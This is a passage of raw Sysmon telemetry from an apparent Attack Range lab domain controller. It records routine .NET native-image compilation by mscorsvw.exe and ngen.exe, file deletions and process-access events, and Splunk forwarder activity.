21:01:18.185{4DB9351A-A11D-60D3-8702-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0DSCRF6YH1\System.Runtime.Caching.ni.dll.auxMD5=F796378188C5CE8116835381A819120B,SHA256=C8AE9BBAA0B3A23F6D9456055BB0CE11583CC362E46DD318FBD7247D45BE9C81,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.185{4DB9351A-A11D-60D3-8702-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0DSCRF6YH1\System.Runtime.Caching.ni.dllMD5=D02EC327DB634B2F264668E78C834445,SHA256=0FD17BC2A1911A06806803AAD97B65677DF475D0D3A002AC713253FF3ADE7615,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:18.170{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\15a8-0\System.Runtime.Caching.dll2021-06-23 21:01:18.170 10341000x800000000000000018955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:17.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11D-60D3-8702-00000000CF01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.951{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F37894A1A84B7B8270DB203E9D801584,SHA256=BF751FDEF59EE44DCB0E4014DF7F4752F7E65CE9FB73787CC06747B6526E4AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.920{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC0D3D6704C27B074D9279AA1CA1E90,SHA256=4AEBB3FEACCB4937456FB83AFB8AD60DF3B2E94B9EAF0F1D3462C1DA0CB6D9CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.763{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:19.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8E02-00000000CF01}1268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000018987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.685{4DB9351A-A11F-60D3-8D02-00000000CF01}7108NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCGOPZ2UF0\System.Security.ni.dll.auxMD5=7C2D1E993C4D34C13A652BAAB81CFCA0,SHA256=C6706940A2E53CFBEEDCF292BD421E97F2337143BB54A87183CD10A21DA869F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.685{4DB9351A-A11F-60D3-8D02-00000000CF01}7108NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCGOPZ2UF0\System.Security.ni.dllMD5=4844641A15F302B35F8081D78C27A951,SHA256=BC1E5C710E4E2C689E9BFB424C0AB85224A3145230E54BBBC8A91559640BA350,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:19.670{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bc4-0\System.Security.dll2021-06-23 21:01:19.670 23542300x800000000000000018984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.123{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434F3EF6B193B8AE99ED86B746F8349C,SHA256=69D3AE5220DD3F1DD54A6C77C637FB8B604A4BBA57EEBBB1BFF7C2C3BBD63B87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:19.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.076{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:19.076{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8D02-00000000CF01}7108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:19.013{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11F-60D3-8C02-00000000CF01}6412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.857{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.842{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:20.842{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-9102-00000000CF01}5720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-9002-00000000CF01}6744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.685{4DB9351A-A120-60D3-8F02-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RKOWJUDZ0G\System.ServiceModel.Activation.ni.dll.auxMD5=EF191DB9F47755D77A9F1708A8128A2B,SHA256=B7AADD292E0F22889CD7BABB11B84A6AC7AC615EBA615D39A7221D0313DE90C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.685{4DB9351A-A120-60D3-8F02-00000000CF01}7120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RKOWJUDZ0G\System.ServiceModel.Activation.ni.dllMD5=306B2DCDC0C5280863865518E935B0E2,SHA256=BBC6BBCCA350173D6B5E27C3688D33656A65D1253551A9EA801B27FB277A16B8,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:20.654{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bd0-0\System.ServiceModel.Activation.dll2021-06-23 21:01:20.654 354300x800000000000000018996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:18.207{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61369-false10.0.1.12-8000- 10341000x800000000000000018995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:20.013{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:20.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:20.013{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A120-60D3-8F02-00000000CF01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000019007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:21.045{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DE28A2619B24D19CA6CDBA02173FB8E,SHA256=9388D4454883862FCB06D0591FDBC86AC0E2DA6141133D56C0800BCA92FDE948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:21.013{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 